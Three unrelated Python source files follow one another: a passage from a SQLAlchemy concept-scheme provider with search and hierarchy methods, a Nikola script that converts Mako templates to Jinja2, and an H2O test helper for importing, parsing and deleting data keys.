:param string lan: A language (eg. "en", "nl", "la", "fr")
'''
l = c.label(lan)
return {
'id': c.concept_id,
'uri': c.uri,
'type': c.type,
'label': l.label if l is not None else None
}
def find(self, query, **kwargs):
lan = self._get_language(**kwargs)
model = Thing
if 'matches' in query:
match_uri = query['matches'].get('uri', None)
if not match_uri:
raise ValueError(
'Please provide a URI to match with.'
)
model = ConceptModel
q = self.session\
.query(model)\
.options(joinedload('labels'))\
.join(MatchModel)\
.filter(model.conceptscheme_id == self.conceptscheme_id)
mtype = query['matches'].get('type')
if mtype and mtype in Concept.matchtypes:
mtype += 'Match'
mtypes = [mtype]
if mtype == 'closeMatch':
mtypes.append('exactMatch')
q = q.filter(
MatchModel.uri == match_uri,
MatchModel.matchtype_id.in_(mtypes)
)
else:
q = q.filter(MatchModel.uri == match_uri)
else:
q = self.session\
.query(model)\
.options(joinedload('labels'))\
.filter(model.conceptscheme_id == self.conceptscheme_id)
if 'type' in query and query['type'] in ['concept', 'collection']:
q = q.filter(model.type == query['type'])
if 'label' in query:
q = q.filter(
model.labels.any(
LabelModel.label.ilike('%' + query['label'].lower() + '%')
)
)
if 'collection' in query:
coll = self.get_by_id(query['collection']['id'])
if not coll or not isinstance(coll, Collection):
raise ValueError(
'You are searching for items in an unexisting collection.'
)
if 'depth' in query['collection'] and query['collection']['depth'] == 'all':
members = self.expand(coll.id)
else:
members = coll.members
q = q.filter(model.concept_id.in_(members))
all = q.all()
sort = self._get_sort(**kwargs)
sort_order = self._get_sort_order(**kwargs)
return [self._get_id_and_label(c, lan) for c in self._sort(all, sort, lan, sort_order=='desc')]
def get_all(self, **kwargs):
all = self.session\
.query(Thing)\
.options(joinedload('labels'))\
.filter(Thing.conceptscheme_id == self.conceptscheme_id)\
.all()
lan = self._get_language(**kwargs)
sort = self._get_sort(**kwargs)
sort_order = self._get_sort_order(**kwargs)
return [self._get_id_and_label(c, lan) for c in self._sort(all, sort, lan, sort_order=='desc')]
def get_top_concepts(self, **kwargs):
# get the concepts that have no direct broader concept
top = self.session\
.query(ConceptModel)\
.options(joinedload('labels'))\
.filter(
ConceptModel.conceptscheme_id == self.conceptscheme_id,
ConceptModel.broader_concepts == None
).all()
# check if they have an indirect broader concept
def _has_higher_concept(c):
for coll in c.member_of:
if coll.infer_concept_relations and (coll.broader_concepts or _has_higher_concept(coll)):
return True
return False
top = [c for c in top if not _has_higher_concept(c)]
lan = self._get_language(**kwargs)
sort = self._get_sort(**kwargs)
sort_order = self._get_sort_order(**kwargs)
return [self._get_id_and_label(c, lan) for c in self._sort(top, sort, lan, sort_order=='desc')]
def expand(self, id):
try:
thing = self.session\
.query(Thing)\
.filter(
Thing.concept_id == id,
Thing.conceptscheme_id == self.conceptscheme_id
).one()
except NoResultFound:
return False
if self.expand_strategy == 'visit':
return self._expand_visit(thing)
elif self.expand_strategy == 'recurse':
return self._expand_recurse(thing)
def _expand_recurse(self, thing):
ret = []
if thing.type == 'collection':
for m in thing.members:
ret += self._expand_recurse(m)
else:
ret.append(thing.concept_id)
for n in thing.narrower_concepts:
ret += self._expand_recurse(n)
for n in thing.narrower_collections:
if n.infer_concept_relations:
ret += self._expand_recurse(n)
return list(set(ret))
def _expand_visit(self, thing):
if thing.type == 'collection':
ret = []
for m in thing.members:
ret += self._expand_visit(m)
else:
try:
cov = self.session\
.query(Visitation.lft, Visitation.rght)\
.filter(Visitation.conceptscheme_id == self.conceptscheme_id)\
.filter(Visitation.concept_id == thing.id)\
.one()
except NoResultFound:
return self._expand_recurse(thing)
ids = self.session\
.query(Thing.concept_id)\
.join(Visitation)\
.filter(Thing.conceptscheme_id == self.conceptscheme_id)\
.filter(Visitation.lft.between(cov[0], cov[1]))\
.all()
ret = [id[0] for id in ids]
return list(set(ret))
def get_top_display(self, **kwargs):
'''
Returns all concepts or collections that form the top-level of a display
hierarchy.
As opposed to the :meth:`get_top_concepts`, this method can possibly
return both concepts and collections.
:rtype: Returns a list of concepts and collections. For each an
id is present and a label. The label is determined by looking at
the `**kwargs` parameter, the default language of the provider
and falls back to `en` if nothing is present.
'''
tco = self.session\
.query(ConceptModel)\
.options(joinedload('labels'))\
.filter(
ConceptModel.conceptscheme_id == self.conceptscheme_id,
ConceptModel.broader_concepts == None,
ConceptModel.member_of == None
).all()
tcl = self.session\
.query(CollectionModel)\
.options(joinedload('labels'))\
.filter(
CollectionModel.conceptscheme_id == self.conceptscheme_id,
CollectionModel.broader_concepts == None,
CollectionModel.member_of == None
).all()
res = tco + tcl
lan = self._get_language(**kwargs)
sort = self._get_sort(**kwargs)
sort_order = self._get_sort_order(**kwargs)
return [self._get_id_and_label(c, lan) for c in self._sort(res, sort, lan, sort_order=='desc')]
def get_children_display(self, id, **kwargs):
'''
Return a list of concepts or collections that should be displayed
under this concept or collection.
:param id: A concept or collection id.
:rtype: A list of concepts and collections. For each an
id is present and a label. The label is determined by looking at
the `**kwargs` parameter, the default language of the provider
and falls back to `en` if nothing is present. If the id does not
exist, return `False`.
'''
try:
thing = self.session\
.query(Thing)\
.filter(
Thing.concept_id == int(id),
Thing.conceptscheme_id == self.conceptscheme_id
).one()
except NoResultFound:
return False
lan = self._get_language(**kwargs)
res = []
if thing.type == 'concept':
if len(thing.narrower_collections) > 0:
res += thing.narrower_collections
elif len(thing.narrower_concepts)>0:
res += thing.narrower_concepts
if thing.type == 'collection' and hasattr(thing, 'members'):
res += thing.members
sort = self._get_sort(**kwargs)
sort_order = self._get_sort_order(**kwargs)
return [self._get_id_and_label(c, lan) for c in self._sort(res, sort, lan, sort_order=='desc')]
|
|
#!/usr/bin/env python
"""Script to convert templates from Mako to Jinja2."""
import io
import glob
import sys
import os
import re
import json
import shutil
import tempfile
import colorama
import jinja2
dumb_replacements = [
["{% if any(post.is_mathjax for post in posts) %}", '{% if posts|selectattr("is_mathjax")|list %}'],
["json.dumps(title)", "title|tojson"],
["{{ parent.extra_head() }}", "{{ super() }}"],
["{{ parent.content() }}", "{{ super() }}"],
["prefix='\\", "prefix='"],
["og: http://ogp.me/ns# \\", "og: http://ogp.me/ns#"],
["article: http://ogp.me/ns/article# \\", "article: http://ogp.me/ns/article#"],
["fb: http://ogp.me/ns/fb# \\", "fb: http://ogp.me/ns/fb#"],
['dir="rtl" \\', 'dir="rtl"'],
['sorted(translations)', 'translations|sort'],
]
dumber_replacements = [
['<%! import json %>\n\n', ''],
["<html\n\\", "<html\n"],
["\n'\\\n", "\n'\n"],
["{% endif %}\n\\", "{% endif %}\n"]
]
def jinjify(in_theme, out_theme):
"""Convert in_theme into a jinja version and put it in out_theme"""
in_templates_path = os.path.join(in_theme, "templates")
out_templates_path = os.path.join(out_theme, "templates")
try:
os.makedirs(out_templates_path)
except:
pass
lookup = jinja2.Environment()
lookup.filters['tojson'] = json.dumps
lookup.loader = jinja2.FileSystemLoader([out_templates_path], encoding='utf-8')
for template in glob.glob(os.path.join(in_templates_path, "*.tmpl")):
out_template = os.path.join(out_templates_path, os.path.basename(template))
with io.open(template, "r", encoding="utf-8") as inf:
data = mako2jinja(inf)
lines = []
for line in data.splitlines():
for repl in dumb_replacements:
line = line.replace(*repl)
lines.append(line)
data = '\n'.join(lines)
for repl in dumber_replacements:
data = data.replace(*repl)
with io.open(out_template, "w+", encoding="utf-8") as outf:
outf.write(data + '\n')
# Syntax check output
source, filename = lookup.loader.get_source(lookup, os.path.basename(template))[:2]
try:
lookup.parse(source)
except Exception as e:
error("Syntax error in {0}:{1}".format(out_template, e.lineno))
parent = os.path.basename(in_theme.rstrip('/'))
child = os.path.basename(out_theme.rstrip('/'))
mappings = {
'base-jinja': 'base',
'bootstrap3-jinja': 'base-jinja',
}
if child in mappings:
parent = mappings[child]
# Copy assets in bootstrap/bootstrap3
if child == 'bootstrap3-jinja':
assets_dir = os.path.join(out_theme, "assets")
if os.path.exists(assets_dir):
shutil.rmtree(assets_dir)
shutil.copytree(
os.path.join(in_theme, "assets"), os.path.join(out_theme, "assets"),
symlinks=True)
# Copy bundles
# shutil.copy(os.path.join(in_theme, "bundles"), os.path.join(out_theme, "bundles"))
# Copy README
if os.path.isfile(os.path.join(in_theme, "README.md")):
shutil.copy(os.path.join(in_theme, "README.md"), os.path.join(out_theme, "README.md"))
def error(msg):
print(colorama.Fore.RED + "ERROR:" + msg)
def mako2jinja(input_file):
output = ''
# TODO: OMG, this code is so horrible. Look at it; just look at it:
macro_start = re.compile(r'(.*)<%.*def name="(.*?)".*>(.*)', re.IGNORECASE)
macro_end = re.compile(r'(.*)</%def>(.*)', re.IGNORECASE)
if_start = re.compile(r'(.*)% *if (.*):(.*)', re.IGNORECASE)
if_else = re.compile(r'(.*)% *else.*:(.*)', re.IGNORECASE)
if_elif = re.compile(r'(.*)% *elif (.*):(.*)', re.IGNORECASE)
if_end = re.compile(r'(.*)% *endif(.*)', re.IGNORECASE)
for_start = re.compile(r'(.*)% *for (.*):(.*)', re.IGNORECASE)
for_end = re.compile(r'(.*)% *endfor(.*)', re.IGNORECASE)
namespace = re.compile(r'(.*)<% *namespace name="(.*?)".* file="(.*?)".*/>(.*)', re.IGNORECASE)
inherit = re.compile(r'(.*)<% *inherit file="(.*?)".*/>(.*)', re.IGNORECASE)
block_single_line = re.compile(r'(.*)<% *block.*name="(.*?)".*>(.*)</% *block>(.*)', re.IGNORECASE)
block_start = re.compile(r'(.*)<% *block.*name="(.*?)".*>(.*)', re.IGNORECASE)
block_end = re.compile(r'(.*)</%block>(.*)', re.IGNORECASE)
val = re.compile(r'\$\{(.*?)\}', re.IGNORECASE)
func_len = re.compile(r'len\((.*?)\)', re.IGNORECASE)
filter_h = re.compile(r'\|h', re.IGNORECASE)
filter_striphtml = re.compile(r'\|striphtml', re.IGNORECASE)
filter_u = re.compile(r'\|u', re.IGNORECASE)
comment_single_line = re.compile(r'^.*##(.*?)$', re.IGNORECASE)
for line in input_file:
# Process line for repeated inline replacements
m_val = val.search(line)
m_func_len = func_len.search(line)
m_filter_h = filter_h.search(line)
m_filter_striphtml = filter_striphtml.search(line)
m_filter_u = filter_u.search(line)
if m_val:
line = val.sub(r'{{ \1 }}', line)
if m_filter_h:
line = filter_h.sub(r'|e', line)
if m_filter_striphtml:
line = filter_striphtml.sub(r'|e', line)
if m_filter_u:
line = filter_u.sub(r'|urlencode', line)
if m_func_len:
line = func_len.sub(r'\1|length', line)
# Process line for single 'whole line' replacements
m_macro_start = macro_start.search(line)
m_macro_end = macro_end.search(line)
m_if_start = if_start.search(line)
m_if_else = if_else.search(line)
m_if_elif = if_elif.search(line)
m_if_end = if_end.search(line)
m_for_start = for_start.search(line)
m_for_end = for_end.search(line)
m_namspace = namespace.search(line)
m_inherit = inherit.search(line)
m_block_single_line = block_single_line.search(line)
m_block_start = block_start.search(line)
m_block_end = block_end.search(line)
m_comment_single_line = comment_single_line.search(line)
if m_comment_single_line:
output += m_comment_single_line.expand(r'{# \1 #}') + '\n'
elif m_macro_start:
output += m_macro_start.expand(r'\1{% macro \2 %}\3') + '\n'
elif m_macro_end:
output += m_macro_end.expand(r'\1{% endmacro %}\1') + '\n'
elif m_if_start:
output += m_if_start.expand(r'\1{% if \2 %}\3') + '\n'
elif m_if_else:
output += m_if_else.expand(r'\1{% else %}\2') + '\n'
elif m_if_elif:
output += m_if_elif.expand(r'\1{% elif \2 %}\3') + '\n'
elif m_if_end:
output += m_if_end.expand(r'\1{% endif %}\2') + '\n'
elif m_for_start:
output += m_for_start.expand(r'\1{% for \2 %}\3') + '\n'
elif m_for_end:
output += m_for_end.expand(r'\1{% endfor %}\2') + '\n'
elif m_namspace:
output += m_namspace.expand(r"\1{% import '\3' as \2 with context %}\4") + '\n'
elif m_inherit:
output += m_inherit.expand(r"{% extends '\2' %}\3") + '\n'
elif m_block_single_line:
output += m_block_single_line.expand(r'\1{% block \2 %}\3{% endblock %}\4') + '\n'
elif m_block_start:
output += m_block_start.expand(r'\1{% block \2 %}\3') + '\n'
elif m_block_end:
output += m_block_end.expand(r'\1{% endblock %}\2') + '\n'
else:
# Doesn't match anything we're going to process, pass though
output += line
return output
def jinjify_shortcodes(in_dir, out_dir):
for fname in os.listdir(in_dir):
if not fname.endswith('.tmpl'):
continue
in_file = os.path.join(in_dir, fname)
out_file = os.path.join(out_dir, fname)
with open(in_file) as inf:
data = mako2jinja(inf)
with open(out_file, 'w') as outf:
outf.write(data)
def usage():
print("Usage: python {} [in-dir] [out-dir]".format(sys.argv[0]))
print("OR")
print("Usage: python {} [in-file] [out-file]".format(sys.argv[0]))
if __name__ == "__main__":
if len(sys.argv) == 1:
print('Performing standard conversions:')
for m, j in (
('nikola/data/themes/base', 'nikola/data/themes/base-jinja'),
('nikola/data/themes/bootstrap3', 'nikola/data/themes/bootstrap3-jinja')
):
print(' {0} -> {1}'.format(m, j))
jinjify(m, j)
jinjify_shortcodes('nikola/data/shortcodes/mako', 'nikola/data/shortcodes/jinja')
elif len(sys.argv) != 3:
print('ERROR: needs input and output directory (file), or no arguments for default conversions.')
usage()
elif os.path.isdir(sys.argv[1]) and (os.path.isdir(sys.argv[2]) or not os.path.exists(sys.argv[2])):
jinjify(sys.argv[1], sys.argv[2])
elif os.path.isfile(sys.argv[1]) and (os.path.isfile(sys.argv[2]) or not os.path.exists(sys.argv[2])):
tmpdir = tempfile.mkdtemp()
indir = os.path.sep.join((tmpdir, 'in', 'templates'))
outdir = os.path.sep.join((tmpdir, 'out', 'templates'))
os.makedirs(indir)
shutil.copy(sys.argv[1], indir)
jinjify(os.path.dirname(indir), os.path.dirname(outdir))
shutil.move(os.path.sep.join((outdir, os.path.basename(sys.argv[1]))), sys.argv[2])
else:
print('ERROR: the two arguments must be both directories or files')
usage()
|
|
import h2o, h2o_cmd, re, os
import h2o_print as h2p
import getpass, time
#****************************************************************************************
# hdfs/maprfs/s3/s3n paths should be absolute from the bucket (top level)
# so only walk around for local
# using this standalone, we probably want 'put' decision making by default (can always pass schema='local')
def find_folder_and_filename(bucket, pathWithRegex, schema='put', returnFullPath=False):
checkPath = True
# strip the common mistake of leading "/" in path, if bucket is specified too
giveUpAndSearchLocally = False
if bucket is not None and re.match("/", pathWithRegex):
h2o.verboseprint("You said bucket:", bucket, "so stripping incorrect leading '/' from", pathWithRegex)
pathWithRegex = pathWithRegex.lstrip('/')
if bucket is None: # good for absolute path name
bucketPath = ""
elif bucket == ".":
bucketPath = os.getcwd()
# only use if the build_cloud was for remote H2O
# Never use the var for remote, if you're doing a put! (which always sources local)
elif h2o.nodes[0].remoteH2O and schema!='put' and \
(os.environ.get('H2O_REMOTE_BUCKETS_ROOT') or h2o.nodes[0].h2o_remote_buckets_root):
if (bucket=='smalldata' or bucket=='datasets') and schema=='local':
msg1 = "\nWARNING: you're using remote nodes, and 'smalldata' or 'datasets' git buckets, with schema!=put"
msg2 = "\nThose aren't git pull'ed by the test. Since they are user-maintained, not globally-maintained-by-0xdata,"
msg3 = "\nthey may be out of date at those remote nodes?"
msg4 = "\nGoing to assume we find a path to them locally, and remote path will be the same"
h2p.red_print(msg1, msg2, msg3, msg4)
giveUpAndSearchLocally = True
else:
if os.environ.get('H2O_REMOTE_BUCKETS_ROOT'):
rootPath = os.environ.get('H2O_REMOTE_BUCKETS_ROOT')
print "Found H2O_REMOTE_BUCKETS_ROOT:", rootPath
else:
rootPath = h2o.nodes[0].h2o_remote_buckets_root
print "Found h2o_nodes[0].h2o_remote_buckets_root:", rootPath
bucketPath = os.path.join(rootPath, bucket)
checkPath = False
# does it work to use bucket "." to get current directory
# this covers reote with put too
elif os.environ.get('H2O_BUCKETS_ROOT'):
rootPath = os.environ.get('H2O_BUCKETS_ROOT')
print "Using H2O_BUCKETS_ROOT environment variable:", rootPath
if not (os.path.exists(rootPath)):
raise Exception("H2O_BUCKETS_ROOT in env but %s doesn't exist." % rootPath)
bucketPath = os.path.join(rootPath, bucket)
if not (os.path.exists(bucketPath)):
raise Exception("H2O_BUCKETS_ROOT and path used to form %s which doesn't exist." % bucketPath)
else:
giveUpAndSearchLocally = True
#******************************************************************************************
if giveUpAndSearchLocally:
# if we run remotely, we're assuming the import folder path on the remote machine
# matches what we find on our local machine. But maybe the local user doesn't exist remotely
# so using his path won't work.
# Resolve by looking for special state in the config. If user = 0xdiag, just force the bucket location
# This is a lot like knowing about fixed paths with s3 and hdfs
# Otherwise the remote path needs to match the local discovered path.
# want to check the username being used remotely first. should exist here too if going to use
username = getpass.getuser()
h2oUsername = h2o.nodes[0].username
h2o.verboseprint("username:", username, "h2oUsername:", h2oUsername)
# bucket named "datasets" is special. Don't want to find it in /home/0xdiag/datasets
# needs to be the git clone 'datasets'. Find it by walking upwards below
# disable it from this looking in home dir. Could change priority order?
# resolved in order, looking for bucket (ln -s will work) in these home dirs.
if bucket=='datasets': # special case
possibleUsers = []
elif h2oUsername != username:
possibleUsers = [username, h2oUsername, "0xdiag"]
else:
possibleUsers = [username, "0xdiag"]
for u in possibleUsers:
rootPath = os.path.expanduser("~" + u)
bucketPath = os.path.join(rootPath, bucket)
h2o.verboseprint("Checking bucketPath:", bucketPath, 'assuming home is', rootPath)
if os.path.exists(bucketPath):
h2o.verboseprint("search A did find", bucket, "at", rootPath)
break
else:
# last chance to find it by snooping around
rootPath = os.getcwd()
h2o.verboseprint("find_bucket looking upwards from", rootPath, "for", bucket)
# don't spin forever
levels = 0
while not (os.path.exists(os.path.join(rootPath, bucket))):
h2o.verboseprint("Didn't find", bucket, "at", rootPath)
rootPath = os.path.split(rootPath)[0]
levels += 1
if (levels==6):
raise Exception("unable to find bucket: %s. Maybe missing link in /home/0xdiag or /home/0xcustomer or jenkins ~? or whatever user is running the python or the h2o?" % bucket)
h2o.verboseprint("search B did find", bucket, "at", rootPath)
bucketPath = os.path.join(rootPath, bucket)
#******************************************************************************************
# if there's no path, just return the bucketPath
# but what about cases with a header in the folder too? (not putfile)
if pathWithRegex is None:
if returnFullPath:
return bucketPath
else:
return (bucketPath, None)
# if there is a "/" in the path, that means it's not just a pattern
# split it
# otherwise it is a pattern. use it to search for files in python first?
# FIX! do that later
elif "/" in pathWithRegex:
(head, tail) = os.path.split(pathWithRegex)
folderPath = os.path.abspath(os.path.join(bucketPath, head))
# accept all 0xcustomer-datasets without checking..since the current python user
# may not have permission, but h2o will
# try a couple times with os.stat in between, in case it's not automounting
if '/mnt/0xcustomer-datasets' in folderPath:
pass
else:
retry = 0
while checkPath and (not os.path.exists(folderPath)) and retry<5:
# we can't stat an actual file, because we could have a regex at the end of the pathname
print "Retrying", folderPath, "in case there's a autofs mount problem"
os.stat(folderPath)
retry += 1
time.sleep(1)
if checkPath and not os.path.exists(folderPath):
raise Exception("%s doesn't exist. %s under %s may be wrong?" % (folderPath, head, bucketPath))
else:
folderPath = bucketPath
tail = pathWithRegex
h2o.verboseprint("folderPath:", folderPath, "tail:", tail)
if returnFullPath:
return os.path.join(folderPath, tail)
else:
return (folderPath, tail)
#***************************************************************************yy
# passes additional params thru kwargs for parse
# use_header_file=
# header=
# exclude=
# src_key= only used if for put file key name (optional)
# path should point to a file or regex of files. (maybe folder works? but unnecessary
def import_only(node=None, schema='local', bucket=None, path=None,
timeoutSecs=30, retryDelaySecs=0.5, initialDelaySecs=0.5, pollTimeoutSecs=180, noise=None,
benchmarkLogging=None, noPoll=False, doSummary=True, src_key=None, noPrint=False,
importParentDir=True, **kwargs):
if src_key and schema!='put':
raise Exception("can only specify a 'src_key' param for schema='put'. You have %s %s" % (schema, src_key))
# no bucket is sometimes legal (fixed path)
if not node: node = h2o.nodes[0]
if path is None:
raise Exception("import_only: path parameter needs to be specified")
if "/" in path:
(head, pattern) = os.path.split(path)
else:
(head, pattern) = ("", path)
h2o.verboseprint("head:", head)
h2o.verboseprint("pattern:", pattern)
# to train users / okay here
# normally we import the folder above, but if we import exactly, the path can't have regex
# the folder can't have regex in any case
if importParentDir:
if re.search(r"[\*<>{}[\]~`]", head):
raise Exception("h2o folder path %s can't be regex. path= was %s" % (head, path))
else:
if re.search(r"[\*<>{}[\]~`]", path):
raise Exception("h2o path %s can't be regex. path= was %s" % (head, path))
if schema=='put':
# to train users
if re.search(r"[/\*<>{}[\]~`]", pattern):
raise Exception("h2o putfile basename %s can't be regex. path= was %s" % (pattern, path))
if not path:
raise Exception("path= didn't say what file to put")
(folderPath, filename) = find_folder_and_filename(bucket, path, schema)
filePath = os.path.join(folderPath, filename)
h2o.verboseprint("put filename:", filename, "folderPath:", folderPath, "filePath:", filePath)
if not noPrint:
h2p.green_print("\nimport_only:", h2o.python_test_name, "uses put:/%s" % filePath)
h2p.green_print("Local path to file that will be uploaded: %s" % filePath)
h2p.blue_print("That path resolves as:", os.path.realpath(filePath))
if h2o.abort_after_import:
raise Exception("Aborting due to abort_after_import (-aai) argument's effect in import_only()")
key = node.put_file(filePath, key=src_key, timeoutSecs=timeoutSecs)
return (None, key)
if schema=='local' and not \
(node.redirect_import_folder_to_s3_path or node.redirect_import_folder_to_s3n_path):
(folderPath, pattern) = find_folder_and_filename(bucket, path, schema)
filePath = os.path.join(folderPath, pattern)
h2p.green_print("\nimport_only:", h2o.python_test_name, "uses local:/%s" % filePath)
h2p.green_print("Path h2o will be told to use: %s" % filePath)
h2p.blue_print("If local jvms, path resolves locally as:", os.path.realpath(filePath))
if h2o.abort_after_import:
raise Exception("Aborting due to abort_after_import (-aai) argument's effect in import_only()")
folderURI = 'nfs:/' + folderPath
if importParentDir:
importResult = node.import_files(folderPath, timeoutSecs=timeoutSecs)
else:
importResult = node.import_files(folderPath + "/" + pattern, timeoutSecs=timeoutSecs)
else:
if bucket is not None and re.match("/", head):
h2o.verboseprint("You said bucket:", bucket, "so stripping incorrect leading '/' from", head)
head = head.lstrip('/')
# strip leading / in head if present
if bucket and head!="":
folderOffset = bucket + "/" + head
elif bucket:
folderOffset = bucket
else:
folderOffset = head
print "\nimport_only:", h2o.python_test_name, schema, "uses", schema + "://" + folderOffset + "/" + pattern
if h2o.abort_after_import:
raise Exception("Aborting due to abort_after_import (-aai) argument's effect in import_only()")
n = h2o.nodes[0]
if schema=='s3' or node.redirect_import_folder_to_s3_path:
folderURI = "s3://" + folderOffset
if not n.aws_credentials:
print "aws_credentials: %s" % n.aws_credentials
# raise Exception("Something was missing for s3 on the java -jar cmd line when the cloud was built")
print "ERROR: Something was missing for s3 on the java -jar cmd line when the cloud was built"
if importParentDir:
importResult = node.import_files(folderURI, timeoutSecs=timeoutSecs)
else:
importResult = node.import_files(folderURI + "/" + pattern, timeoutSecs=timeoutSecs)
elif schema=='s3n' or node.redirect_import_folder_to_s3n_path:
if not (n.use_hdfs and ((n.hdfs_version and n.hdfs_name_node) or n.hdfs_config)):
print "use_hdfs: %s hdfs_version: %s hdfs_name_node: %s hdfs_config: %s" % \
(n.use_hdfs, n.hdfs_version, n.hdfs_name_node, n.hdfs_config)
# raise Exception("Something was missing for s3n on the java -jar cmd line when the cloud was built")
print "ERROR: Something was missing for s3n on the java -jar cmd line when the cloud was built"
folderURI = "s3n://" + folderOffset
if importParentDir:
importResult = node.import_files(folderURI, timeoutSecs=timeoutSecs)
else:
importResult = node.import_files(folderURI + "/" + pattern, timeoutSecs=timeoutSecs)
elif schema=='maprfs':
if not n.use_maprfs:
print "use_maprfs: %s" % n.use_maprfs
# raise Exception("Something was missing for maprfs on the java -jar cmd line when the cloud was built")
print "ERROR: Something was missing for maprfs on the java -jar cmd line when the cloud was built"
# if I use the /// and default, the key names that get created by h2o only have 1 slash
# so the parse doesn't find the key name
if n.hdfs_name_node:
folderURI = "maprfs://" + n.hdfs_name_node + "/" + folderOffset
else:
# this is different than maprfs? normally we specify the name though
# folderURI = "maprfs:///" + folderOffset
folderURI = "maprfs:/" + folderOffset
if importParentDir:
importResult = node.import_files(folderURI, timeoutSecs=timeoutSecs)
else:
importResult = node.import_files(folderURI + "/" + pattern, timeoutSecs=timeoutSecs)
elif schema=='hdfs':
# check that some state from the cloud building time was right
# the requirements for this may change and require updating
if not (n.use_hdfs and ((n.hdfs_version and n.hdfs_name_node) or n.hdfs_config)):
print "use_hdfs: %s hdfs_version: %s hdfs_name_node: %s hdfs_config: %s" % \
(n.use_hdfs, n.hdfs_version, n.hdfs_name_node, n.hdfs_config)
# raise Exception("Something was missing for hdfs on the java -jar cmd line when the cloud was built")
print "ERROR: Something was missing for hdfs on the java -jar cmd line when the cloud was built"
if n.hdfs_name_node:
folderURI = "hdfs://" + n.hdfs_name_node + "/" + folderOffset
else:
# this is different than maprfs? normally we specify the name though
folderURI = "hdfs://" + folderOffset
if importParentDir:
importResult = node.import_files(folderURI, timeoutSecs=timeoutSecs)
else:
importResult = node.import_files(folderURI + "/" + pattern, timeoutSecs=timeoutSecs)
else:
raise Exception("schema not understood: %s" % schema)
importPattern = folderURI + "/" + pattern
return (importResult, importPattern)
#****************************************************************************************
# can take header, header_from_file, exclude params
def parse_only(node=None, pattern=None, hex_key=None,
timeoutSecs=30, retryDelaySecs=0.5, initialDelaySecs=0.5, pollTimeoutSecs=180, noise=None,
benchmarkLogging=None, noPoll=False, **kwargs):
if not node: node = h2o.nodes[0]
parseResult = node.parse(key=pattern, key2=hex_key,
timeoutSecs=timeoutSecs, retryDelaySecs=retryDelaySecs,
initialDelaySecs=initialDelaySecs, pollTimeoutSecs=pollTimeoutSecs, noise=noise,
benchmarkLogging=benchmarkLogging, noPoll=noPoll, **kwargs)
parseResult['python_source'] = pattern
return parseResult
#****************************************************************************************
def import_parse(node=None, schema='local', bucket=None, path=None,
src_key=None, hex_key=None,
timeoutSecs=30, retryDelaySecs=0.5, initialDelaySecs=0.5, pollTimeoutSecs=180, noise=None,
benchmarkLogging=None, noPoll=False, doSummary=True, noPrint=True,
importParentDir=True, **kwargs):
if not node: node = h2o.nodes[0]
(importResult, importPattern) = import_only(node, schema, bucket, path,
timeoutSecs, retryDelaySecs, initialDelaySecs, pollTimeoutSecs, noise,
benchmarkLogging, noPoll, doSummary, src_key, noPrint, importParentDir, **kwargs)
h2o.verboseprint("importPattern:", importPattern)
h2o.verboseprint("importResult", h2o.dump_json(importResult))
parseResult = parse_only(node, importPattern, hex_key,
timeoutSecs, retryDelaySecs, initialDelaySecs, pollTimeoutSecs, noise,
benchmarkLogging, noPoll, **kwargs)
h2o.verboseprint("parseResult:", h2o.dump_json(parseResult))
# do SummaryPage here too, just to get some coverage
# only if not noPoll. otherwise parse isn't done
if doSummary and not noPoll:
# if parse blows up, we want error isolation ..i.e. find stack traces here, rather than the next guy blowing up
h2o.check_sandbox_for_errors()
inspect = node.inspect(parseResult['destination_key'], timeoutSecs=timeoutSecs)
numRows = inspect['numRows']
numCols = inspect['numCols']
# we pass numCols, for detecting whether the na cnt means a col is all NAs, (for ignoring min/max/mean/sigma)
node.summary_page(parseResult['destination_key'], timeoutSecs=timeoutSecs, noPrint=noPrint, numRows=numRows, numCols=numCols)
# for now, don't worry about error isolating summary
else:
# isolate a parse from the next thing
h2o.check_sandbox_for_errors()
return parseResult
# returns full key name, from current store view
def find_key(pattern=None):
found = None
kwargs = {'filter': pattern}
storeViewResult = h2o.nodes[0].store_view(**kwargs)
keys = storeViewResult['keys']
if len(keys) == 0:
return None
if len(keys) > 1:
h2o.verboseprint("Warning: multiple imported keys match the key pattern given, Using: %s" % keys[0]['key'])
return keys[0]['key']
#****************************************************************************************
# the storeViewResult for every node may or may not be the same
# supposed to be the same? In any case
# pattern can't be regex to h2o?
# None should be same as no pattern
def delete_keys(node=None, pattern=None, timeoutSecs=120):
if not node: node = h2o.nodes[0]
kwargs = {'filter': pattern}
deletedCnt = 0
triedKeys = []
while True:
# FIX! h2o is getting a bad store_view NPE stack trace if I grabe all the
# keys at the end of a test, prior to removing. Just grab 20 at a time like h2o
# used to do for me. Maybe the keys are changing state, and going slower will eliminate the race
# against prior work (but note that R might see the same problem
storeViewResult = h2o_cmd.runStoreView(node, timeoutSecs=timeoutSecs, view=20, **kwargs)
# we get 20 at a time with default storeView
keys = storeViewResult['keys']
if not keys:
break
# look for keys we already sent a remove on. Maybe those are locked.
# give up on those
deletedThisTime = 0
for k in keys:
if k in triedKeys:
print "Already tried to delete %s. Must have failed. Not trying again" % k
# don't delete the DRF __Tree__ keys. deleting the model does that. causes race conditions
elif '__Tree__' in k['key']:
print "Not deleting a tree key from DRF: %s" % k
elif 'DRF_' in k['key']:
print "Not deleting DRF key..they may be problematic in flight: %s" % k
elif '__RFModel__' in k['key']:
print "Not deleting __RFModel__ key..seeing NPE's if I try to delete them: %s" % k
else:
print "Deleting", k['key'], "at", node
node.remove_key(k['key'], timeoutSecs=timeoutSecs)
deletedCnt += 1
deletedThisTime += 1
triedKeys.append(k)
# print "Deleted", deletedCnt, "keys at %s:%s" % (node.http_addr, node.port)
if deletedThisTime==0:
break
# this is really the count that we attempted. Some could have failed.
return deletedCnt
# if pattern is used, don't use the heavy h2o method
def delete_keys_at_all_nodes(node=None, pattern=None, timeoutSecs=120):
time.sleep(5)
# TEMP: change this to remove_all_keys which ignores locking and removes keys?
# getting problems when tests fail in multi-test-on-one-h2o-cluster runner*sh tests
if not node: node = h2o.nodes[0]
totalDeletedCnt = 0
# do it in reverse order, since we always talk to 0 for other stuff
# this will be interesting if the others don't have a complete set
# theoretically, the deletes should be 0 after the first node
# since the deletes should be global
for node in reversed(h2o.nodes):
deletedCnt = delete_keys(node, pattern=pattern, timeoutSecs=timeoutSecs)
totalDeletedCnt += deletedCnt
if pattern:
print "Total: Deleted", totalDeletedCnt, "keys with filter=", pattern, "at", len(h2o.nodes), "nodes"
else:
print "Total: Deleted", totalDeletedCnt, "keys at", len(h2o.nodes), "nodes"
# do a remove_all_keys to clean out any locked keys also (locked keys will complain above)
# doesn't work if you remove job keys first, since it looks at the job list and gets confused
### node.remove_all_keys(timeoutSecs=timeoutSecs)
